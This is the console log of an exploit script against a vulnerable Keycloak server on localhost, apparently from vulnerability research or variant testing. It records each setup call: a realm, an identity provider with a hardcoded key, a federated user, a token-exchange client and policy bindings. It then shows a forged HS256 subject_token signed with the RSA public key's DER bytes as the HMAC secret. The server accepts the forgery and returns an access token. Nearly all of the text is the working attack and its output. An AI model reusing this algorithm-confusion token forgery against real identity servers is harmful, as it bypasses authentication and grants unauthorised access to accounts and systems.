=== Variant exploit against vulnerable Keycloak (keycloak-vuln-variant) === Admin token obtained. Create realm: 201 RSA key pair generated. DER bytes: 294 Create oidc IdP (hardcoded key): 201 Create federated user: 201 Create te-client: 201 Enable IdP mgmt permissions: 200 {"enabled":true,"resource":"5fe55aff-cdcb-4835-8da1-6b4905afc6e5","scopePermissions":{"token-exchange":"0908b3e9-11c7-47fe-9810-aa0f01fb7fbd"}} Create client policy: 201 policy_id=13869bbb-7240-4190-a5b2-57c102bc9a62 Bind policy to token-exchange permission: 201 Forged HS256 subject_token header: {"alg":"HS256","typ":"JWT"} Forged HS256 subject_token payload: {"iss": "https://external-idp-issuer", "sub": "basic-user-id", "aud": "https://external-idp-issuer", "typ": "Bearer", "exp": 1783267514, "iat": 1783267214, "jti": "7f8aff31-2078-4872-a7d6-16911e2769bc"} HMAC secret = RSA public key DER bytes (294 bytes) Submitting external token exchange with forged HS256 subject_token... Response status: 200 Response body: {"access_token": "eyJhbGciOiJSUzI1NiIsInR5cCIgOiAiSldUIiwia2lkIiA6ICJ5R25qY1BsTFNPUG5YNm9LdTFiQmVGaS1qZ2JPMUVVd1dmanVoc0tzV0xjIn0.eyJleHAiOjE3ODMyNjc1MTQsImlhdCI6MTc4MzI2NzIxNCwianRpIjoib25ydG5hOmYzMmZhZDRjLTE3MjMtMmNkNS02ODBhLTQ0N2QzODAyOTFmYyIsImlzcyI6Imh0dHA6Ly9sb2NhbGhvc3Q6ODA4MC9yZWFsbXMvdGVzdC *** vulnerable: forged HS256 subject_token ACCEPTED! Access token received. *** Token sub: 22fc6dbd-ee3d-4057-8c20-19376de89dbf Token azp (client): te-client Token iss: http://localhost:8080/realms/test-realm